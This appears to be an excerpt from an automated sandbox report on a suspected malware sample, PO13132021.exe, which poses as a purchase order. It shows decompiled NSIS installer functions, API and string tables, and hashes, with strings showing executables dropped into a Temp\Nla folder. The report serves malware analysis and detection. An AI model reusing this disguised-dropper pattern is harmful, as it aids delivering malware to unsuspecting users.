							_t36 =  *0x423f20; // 0x0
							_t39 = DialogBoxParamA( *0x424740, _t36 + 0x00000069 & 0x0000ffff, 0, E00403DD8, 0);
							E0040398B(E0040140B(5), 1);
							return _t39;
						}
						L22:
						_t31 = 2;
						return _t31;
					} else {
						_t71 =  *0x424740;
						 *0x423ee4 = E00401000;
						 *0x423ef0 =  *0x424740;
						 *0x423ef4 = _t25;
						 *0x423f04 = 0x40a210;
						if(RegisterClassA(0x423ee0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoA(0x30, 0,  &_v16, 0);
						 *0x420d30 = CreateWindowExA(0x80, 0x40a210, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x424740, 0);
						goto L21;
					}
				} else {
					_t71 =  *(_t76 + 0x48);
					_t86 = _t71;
					if(_t71 == 0) {
						goto L16;
					}
					_t74 = 0x4236e0;
					E0040610F(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x424798, 0x4236e0, 0);
					_t57 =  *0x4236e0; // 0x43
					if(_t57 == 0) {
						goto L16;
					}
					if(_t57 == 0x22) {
						_t74 = 0x4236e1;
						 *((char*)(E00405BEB(0x4236e1, 0x22))) = 0;
					}
					_t59 = lstrlenA(_t74) + _t74 - 4;
					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
						L15:
						E00406228(_t80, E00405BC0(_t74));
						goto L16;
					} else {
						_t63 = GetFileAttributesA(_t74);
						if(_t63 == 0xffffffff) {
							L14:
							E00405C07(_t74);
							goto L15;
						}
						_t92 = _t63 & 0x00000010;
						if((_t63 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00403a41
0x00403a4a
0x00403a51
0x00403a53
0x00403a67
0x00403a79
0x00403a80
0x00403a87
0x00403a8d
0x00403a92
0x00403a98
0x00403aab
0x00403aab
0x00403ab6
0x00403a55
0x00403a55
0x00403a60
0x00403a60
0x00403abb
0x00403ac5
0x00403ace
0x00403ad3
0x00403ae4
0x00403b6b
0x00403b73
0x00403b7c
0x00403b7c
0x00403b92
0x00403b98
0x00403ba6
0x00403c27
0x00403c2f
0x00403c39
0x00403c3e
0x00403c44
0x00403cce
0x00403cd3
0x00403cd5
0x00403cf1
0x00000000
0x00403cf1
0x00403cd7
0x00403cdd
0x00403ce5
0x00403ce5
0x00000000
0x00403cdd
0x00403c52
0x00403c5d
0x00403c62
0x00403c64
0x00403c6b
0x00403c6b
0x00403c76
0x00403c7e
0x00403c80
0x00403c82
0x00403c8b
0x00403c8e
0x00403c94
0x00403c94
0x00403c9a
0x00403cb3
0x00403cc4
0x00000000
0x00403cc9
0x00403c31
0x00403c33
0x00000000
0x00403ba8
0x00403ba8
0x00403bb4
0x00403bbe
0x00403bc4
0x00403bc9
0x00403bd8
0x00403cf6
0x00403cf6
0x00000000
0x00403cf6
0x00403be7
0x00403c22
0x00000000
0x00403c22
0x00403aea
0x00403aea
0x00403aed
0x00403aef
0x00000000
0x00000000
0x00403af9
0x00403b09
0x00403b0e
0x00403b15
0x00000000
0x00000000
0x00403b19
0x00403b1b
0x00403b28
0x00403b28
0x00403b30
0x00403b36
0x00403b5e
0x00403b66
0x00000000
0x00403b48
0x00403b49
0x00403b52
0x00403b58
0x00403b59
0x00000000
0x00403b59
0x00403b54
0x00403b56
0x00000000
0x00000000
0x00000000
0x00403b56
0x00403b36

APIs

Part of subcall function 00406631: GetModuleHandleA.KERNEL32(?,?,?,004034D4,0000000B), ref: 00406643
Part of subcall function 00406631: GetProcAddress.KERNEL32(00000000,?), ref: 0040665E

GetUserDefaultUILanguage.KERNELBASE(00000002,74B5FA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO13132021.exe" ,00000000), ref: 00403A55

Part of subcall function 00406186: wsprintfA.USER32 ref: 00406193

lstrcatA.KERNEL32(1033,00420D50,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D50,00000000,00000002,74B5FA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO13132021.exe" ,00000000), ref: 00403AB6
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe C:\Users\user\AppData\Local\Temp\Nla\zfngholtp.s,?,?,?,C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe C:\Users\user\AppData\Local\Temp\Nla\zfngholtp.s,00000000,C:\Users\user\AppData\Local\Temp,1033,00420D50,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D50,00000000,00000002,74B5FA90), ref: 00403B2B
lstrcmpiA.KERNEL32(?,.exe,C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe C:\Users\user\AppData\Local\Temp\Nla\zfngholtp.s,?,?,?,C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe C:\Users\user\AppData\Local\Temp\Nla\zfngholtp.s,00000000,C:\Users\user\AppData\Local\Temp,1033,00420D50,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D50,00000000), ref: 00403B3E
GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe C:\Users\user\AppData\Local\Temp\Nla\zfngholtp.s), ref: 00403B49
LoadImageA.USER32 ref: 00403B92
RegisterClassA.USER32 ref: 00403BCF
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403BE7
CreateWindowExA.USER32 ref: 00403C1C
ShowWindow.USER32(00000005,00000000), ref: 00403C52
GetClassInfoA.USER32 ref: 00403C7E
GetClassInfoA.USER32 ref: 00403C8B
RegisterClassA.USER32 ref: 00403C94
DialogBoxParamA.USER32 ref: 00403CB3

Strings

RichEd32, xrefs: 00403C66
RichEdit20A, xrefs: 00403C76, 00403C7C
C:\Users\user\AppData\Local\Temp\, xrefs: 00403A40
.exe, xrefs: 00403B38
C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe C:\Users\user\AppData\Local\Temp\Nla\zfngholtp.s, xrefs: 00403AF9, 00403B01, 00403B0E, 00403B58, 00403B5E
RichEdit, xrefs: 00403C85
.DEFAULT\Control Panel\International, xrefs: 00403AA1
1033, xrefs: 00403A5B, 00403AB1
PB, xrefs: 00403A67
"C:\Users\user\Desktop\PO13132021.exe" , xrefs: 00403A3F
>B, xrefs: 00403BA1
RichEd20, xrefs: 00403C58
Control Panel\Desktop\ResourceLocale, xrefs: 00403A6F
_Nb, xrefs: 00403BAE, 00403C16
C:\Users\user\AppData\Local\Temp, xrefs: 00403AC5, 00403ACD, 00403B65, 00403B6B, 00403B7B

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\PO13132021.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe C:\Users\user\AppData\Local\Temp\Nla\zfngholtp.s$Control Panel\Desktop\ResourceLocale$PB$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$>B
API String ID: 606308-3871697305
Opcode ID: 8cd03706bc3b4e3cd0d6d37f96b9a73a5a3b7a5ac7853bf60a8ad06bd9737550
Instruction ID: 0b0e7d8dfe967f47b98d7fa3c12120eb495d8fa8be153c65172cdb3e572a9271
Opcode Fuzzy Hash: 8cd03706bc3b4e3cd0d6d37f96b9a73a5a3b7a5ac7853bf60a8ad06bd9737550
Instruction Fuzzy Hash: A061C4702046046EE620AF65AD46F3B3A7CEB8574AF40443FF951B62D3CB7D99068A2D

Uniqueness

Uniqueness Score: -1.00%

Function 00402EF1, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 204
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00402EF1(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				long _t54;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				long _t82;
				signed int _t89;
				intOrPtr _t92;
				long _t94;
				void* _t102;
				void* _t106;
				long _t107;
				long _t110;
				intOrPtr* _t111;

				_t94 = 0;
				_v8 = 0;
				_v12 = 0;
				 *0x424750 = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\hardz\\Desktop\\PO13132021.exe", 0x400);
				_t106 = E00405DC1("C:\\Users\\hardz\\Desktop\\PO13132021.exe", 0x80000000, 3);
				 *0x40a018 = _t106;
				if(_t106 == 0xffffffff) {
					return "Error launching installer";
				}
				E00406228("C:\\Users\\hardz\\Desktop", "C:\\Users\\hardz\\Desktop\\PO13132021.exe");
				E00406228(0x42c000, E00405C07("C:\\Users\\hardz\\Desktop"));
				_t54 = GetFileSize(_t106, 0);
				 *0x41f908 = _t54;
				_t110 = _t54;
				if(_t54 <= 0) {
					L24:
					E00402E52(1);
					if( *0x424758 == _t94) {
						goto L32;
					}
					if(_v12 == _t94) {
						L28:
						_t111 = GlobalAlloc(0x40, _v20);
						E00406756(0x40b870);
						E00405DF0( &_v300, "C:\\Users\\hardz\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileA( &_v300, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E00403419( *0x424758 + 0x1c);
							 *0x41f90c = _t65;
							 *0x41f900 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00403192(_v16, 0xffffffff, _t94, _t111, _v20); // executed
							if(_t68 == _v20) {
								 *0x424754 = _t111;
								 *0x42475c =  *_t111;
								if((_v40 & 0x00000001) != 0) {
									 *0x424760 =  *0x424760 + 1;
								}
								_t45 = _t111 + 0x44; // 0x44
								_t70 = _t45;
								_t102 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t111;
									_t102 = _t102 - 1;
								} while (_t102 != 0);
								 *((intOrPtr*)(_t111 + 0x3c)) =  *0x41f8fc;
								E00405D7C(0x424780, _t111 + 4, 0x40);
								return 0;
							}
							goto L32;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E00403419( *0x41f8f8);
					if(E00403403( &_a4, 4) == 0 || _v8 != _a4) {
						goto L32;
					} else {
						goto L28;
					}
				} else {
					do {
						_t107 = _t110;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x424758) & 0x00007e00) + 0x200;
						if(_t110 >= _t82) {
							_t107 = _t82;
						}
						if(E00403403(0x4178f8, _t107) == 0) {
							E00402E52(1);
							L32:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x424758 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00402E52(0);
							}
							goto L20;
						}
						E00405D7C( &_v40, 0x4178f8, 0x1c);
						_t89 = _v40;
						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t89;
							 *0x424800 =  *0x424800 | _a4 & 0x00000002;
							_t92 = _v16;
							 *0x424758 =  *0x41f8f8;
							if(_t92 > _t110) {
								goto L32;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t110 = _t92 - 4;
								if(_t107 > _t110) {
									_t107 = _t110;
								}
								goto L20;
							} else {
								break;
							}
						}
						L20:
						if(_t110 <  *0x41f908) {
							_v8 = E004066E8(_v8, 0x4178f8, _t107);
						}
						 *0x41f8f8 =  *0x41f8f8 + _t107;
						_t110 = _t110 - _t107;
					} while (_t110 != 0);
					_t94 = 0;
					goto L24;
				}
			}

0x00402efc
0x00402eff
0x00402f02
0x00402f1c
0x00402f21
0x00402f34
0x00402f39
0x00402f3f
0x00000000
0x00402f41
0x00402f52
0x00402f63
0x00402f6a
0x00402f72
0x00402f77
0x00402f79
0x00403064
0x00403066
0x00403072
0x00000000
0x00000000
0x0040307b
0x004030a7
0x004030b7
0x004030b9
0x004030ca
0x004030e5
0x004030ee
0x004030f3
0x00403112
0x00403122
0x00403134
0x00403139
0x00403141
0x0040314e
0x00403156
0x0040315b
0x0040315d
0x0040315d
0x00403165
0x00403165
0x00403168
0x00403169
0x00403169
0x0040316c
0x0040316e
0x0040316e
0x00403178
0x00403184
0x00000000
0x00403189
0x00000000
0x00403141
0x00000000
0x004030f5
0x00403083
0x00403095
0x00000000
0x00000000
0x00000000
0x00000000
0x00402f7f
0x00402f84
0x00402f89
0x00402f8d
0x00402f94
0x00402f9b
0x00402f9d
0x00402f9d
0x00402fa8
0x00403101
0x00403143
0x00000000
0x00403143
0x00402fb5
0x00403035
0x00403039
0x0040303e
0x00000000
0x00403035
0x00402fbe
0x00402fc3
0x00402fcb
0x00402ff1
0x00403000
0x00403006
0x0040300b
0x00403011
0x00000000
0x00000000
0x0040301b
0x00403023
0x00403026
0x0040302b
0x0040302d
0x0040302d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040301b
0x0040303f
0x00403045
0x00403051
0x00403051
0x00403054
0x0040305a
0x0040305a
0x00403062
0x00000000
0x00403062

APIs

GetTickCount.KERNEL32 ref: 00402F05
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\PO13132021.exe,00000400), ref: 00402F21

Part of subcall function 00405DC1: GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\user\Desktop\PO13132021.exe,80000000,00000003), ref: 00405DC5
Part of subcall function 00405DC1: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405DE7

GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PO13132021.exe,C:\Users\user\Desktop\PO13132021.exe,80000000,00000003), ref: 00402F6A
GlobalAlloc.KERNEL32(00000040,0040A130), ref: 004030AC

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00402EFB, 004030C4
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004030F5
Error launching installer, xrefs: 00402F41
C:\Users\user\Desktop, xrefs: 00402F4C, 00402F51, 00402F57
soft, xrefs: 00402FDF
Inst, xrefs: 00402FD6
"C:\Users\user\Desktop\PO13132021.exe" , xrefs: 00402EF1
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00403143
Null, xrefs: 00402FE8
C:\Users\user\Desktop\PO13132021.exe, xrefs: 00402F0B, 00402F1A, 00402F2E, 00402F4B

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\PO13132021.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PO13132021.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 2803837635-2785365320
Opcode ID: ca76f8d495ce3895f444a46e92879b513e81ddc2aff1e21a5d111d80dade61e3
Instruction ID: 41f98d992e8437d8d417f3691d947d8f632b5d0a71237712da2b0bb715ca9b84
Opcode Fuzzy Hash: ca76f8d495ce3895f444a46e92879b513e81ddc2aff1e21a5d111d80dade61e3
Instruction Fuzzy Hash: 1B71E131A00259ABDB20AF64DD85B9E3BACEB44355F20803BF911BA2D1C77C9E418B5C

Uniqueness

Uniqueness Score: -1.00%

Function 00401759, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147
stringtimeCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00401759(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				CHAR* _t83;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402BCE(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E00405C2D(_t82);
				_push(_t82);
				_t83 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\Nla\\ioqwel.exe C:\\Users\\hardz\\AppData\\Local\\Temp\\Nla\\zfngholtp.s";
				if(_t33 == 0) {
					lstrcatA(E00405BC0(E00406228(_t83, "C:\\Users\\hardz\\AppData\\Local\\Temp\\Nla")), ??);
				} else {
					E00406228();
				}
				E00406503(_t83);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E0040659C(_t83);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405D9C(_t83);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E00405DC1(_t83, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0xc) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E0040534F(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x4247e8;
						goto L32;
					} else {
						E00406228(0x40ac20, 0x425000);
						E00406228(0x425000, _t83);
						E004062BB(_t75, 0x40ac20, _t83, "C:\Users\hardz\AppData\Local\Temp\Nla",  *((intOrPtr*)(_t85 - 0x14)));
						E00406228(0x425000, 0x40ac20);
						_t62 = E00405944("C:\Users\hardz\AppData\Local\Temp\Nla",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x4247e8 =  &( *0x4247e8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(_t83);
								_push(0xfffffffa);
								E0040534F();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E0040534F(0xffffffea,  *(_t85 - 8));
				 *0x424814 =  *0x424814 + 1;
				_t43 = E00403192(_t77,  *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 0xc), _t75, _t75); // executed
				 *0x424814 =  *0x424814 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0xc)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E004062BB(_t75, _t80, _t83, _t83, 0xffffffee);
					} else {
						E004062BB(_t75, _t80, _t83, _t83, 0xffffffe9);
						lstrcatA(_t83,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(_t83);
					E00405944();
					goto L29;
				}
				goto L33;
			}

0x00401759
0x00401760
0x00401769
0x0040176c
0x0040176f
0x00401774
0x00401775
0x0040177c
0x00401798
0x0040177e
0x0040177f
0x0040177f
0x0040179e
0x004017a8
0x004017a8
0x004017ac
0x004017af
0x004017b4
0x004017b6
0x004017b8
0x004017bd
0x004017bd
0x004017c8
0x004017c8
0x004017d9
0x004017db
0x004017db
0x004017dc
0x004017dc
0x004017df
0x004017e2
0x004017e5
0x004017e5
0x004017ec
0x004017fb
0x00401800
0x00401803
0x00401806
0x00000000
0x00000000
0x00401808
0x0040180b
0x00401865
0x0040186a
0x004015b0
0x004027bf
0x004027bf
0x00402a5a
0x00402a5d
0x00402a5d
0x00000000
0x0040180d
0x00401813
0x0040181e
0x0040182b
0x00401836
0x0040184c
0x0040184c
0x0040184f
0x00000000
0x00401855
0x00401855
0x00401856
0x00401873
0x00402a63
0x00402a63
0x00402a63
0x00401858
0x00401858
0x00401859
0x00401492
0x00402387
0x00402387
0x00402387
0x00401856
0x0040184f
0x00402a65
0x00402a69
0x00402a69
0x00401883
0x00401888
0x00401896
0x0040189b
0x004018a1
0x004018a5
0x004018a7
0x004018af
0x004018bb
0x004018a9
0x004018a9
0x004018ad
0x00000000
0x00000000
0x004018ad
0x004018c4
0x004018ca
0x004018cc
0x00000000
0x004018d2
0x004018d2
0x004018d5
0x004018ed
0x004018d7
0x004018da
0x004018e3
0x004018e3
0x004018f2
0x004018f7
0x00402382
0x00000000
0x00402382
0x00000000

APIs

lstrcatA.KERNEL32(00000000,00000000,C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe C:\Users\user\AppData\Local\Temp\Nla\zfngholtp.s,C:\Users\user\AppData\Local\Temp\Nla,00000000,00000000,00000031), ref: 00401798
CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe C:\Users\user\AppData\Local\Temp\Nla\zfngholtp.s,C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe C:\Users\user\AppData\Local\Temp\Nla\zfngholtp.s,00000000,00000000,C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe C:\Users\user\AppData\Local\Temp\Nla\zfngholtp.s,C:\Users\user\AppData\Local\Temp\Nla,00000000,00000000,00000031), ref: 004017C2

Part of subcall function 00406228: lstrcpynA.KERNEL32(?,?,00000400,00403533,00423F40,NSIS Error,?,00000007,00000009,0000000B), ref: 00406235

Part of subcall function 0040534F: lstrlenA.KERNEL32(00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 00405388
Part of subcall function 0040534F: lstrlenA.KERNEL32(00402EC9,00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 00405398
Part of subcall function 0040534F: lstrcatA.KERNEL32(00420530,00402EC9,00402EC9,00420530,00000000,00000000,00000000), ref: 004053AB
Part of subcall function 0040534F: SetWindowTextA.USER32(00420530,00420530), ref: 004053BD
Part of subcall function 0040534F: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004053E3
Part of subcall function 0040534F: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004053FD
Part of subcall function 0040534F: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040540B

Strings

C:\Users\user\AppData\Local\Temp\Nla, xrefs: 00401786
C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe C:\Users\user\AppData\Local\Temp\Nla\zfngholtp.s, xrefs: 00401775, 0040177E, 0040178B, 0040179D, 004017AE, 004017E4, 004017FA, 00401818, 00401858, 004018D9, 004018E2, 004018EC, 004018F7
C:\Users\user\AppData\Local\Temp\Nla, xrefs: 00401826, 00401842

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\Nla$C:\Users\user\AppData\Local\Temp\Nla$C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe C:\Users\user\AppData\Local\Temp\Nla\zfngholtp.s
API String ID: 1941528284-616505952
Opcode ID: ebc504ea436e693e663a4b144fd74c24bb863413e05106ae1afc4e96b16114fd
Instruction ID: 94ce822b9f6a6483fb8de35dc0b51f709499be211a85e0d844596cfba341e8bc
Opcode Fuzzy Hash: ebc504ea436e693e663a4b144fd74c24bb863413e05106ae1afc4e96b16114fd
Instruction Fuzzy Hash: 0541B931900515BACF107BB5DC45EAF7AB8DF05369B60863FF422B11E1CA7C8A528A6D

Uniqueness

Uniqueness Score: -1.00%

Function 004065C3, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004065C3(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x40a014; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}

0x004065da
0x004065e3
0x004065e5
0x004065e5
0x004065e9
0x004065fb
0x004065f5
0x004065f5
0x004065f5
0x004065ff
0x00406613
0x00406627
0x0040662e

APIs

GetSystemDirectoryA.KERNEL32 ref: 004065DA
wsprintfA.USER32 ref: 00406613
LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406627

Strings

UXTHEME, xrefs: 004065CC
\, xrefs: 004065EB
%s%s.dll, xrefs: 0040660D

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: dd037f00298a2975fe7e642a10d0852ddcb34bcb2038a79f7270f2bd0b83f80d
Instruction ID: 9188928b716331f4199fdf2d451d87d069fed8801fbff73d7d84d2de41a49ecb
Opcode Fuzzy Hash: dd037f00298a2975fe7e642a10d0852ddcb34bcb2038a79f7270f2bd0b83f80d
Instruction Fuzzy Hash: D9F0F6706006097BEB249B68ED0DFEB365CAB08304F1404BEA186E10D1EA78D8358BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00405DF0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405DF0(char _a4, intOrPtr _a6, CHAR* _a8) {
				char _t11;
				signed int _t12;
				int _t15;
				signed int _t17;
				void* _t20;
				CHAR* _t21;

				_t21 = _a4;
				_t20 = 0x64;
				while(1) {
					_t11 =  *0x40a3ec; // 0x61736e
					_t20 = _t20 - 1;
					_a4 = _t11;
					_t12 = GetTickCount();
					_t17 = 0x1a;
					_a6 = _a6 + _t12 % _t17;
					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
					if(_t15 != 0) {
						break;
					}
					if(_t20 != 0) {
						continue;
					}
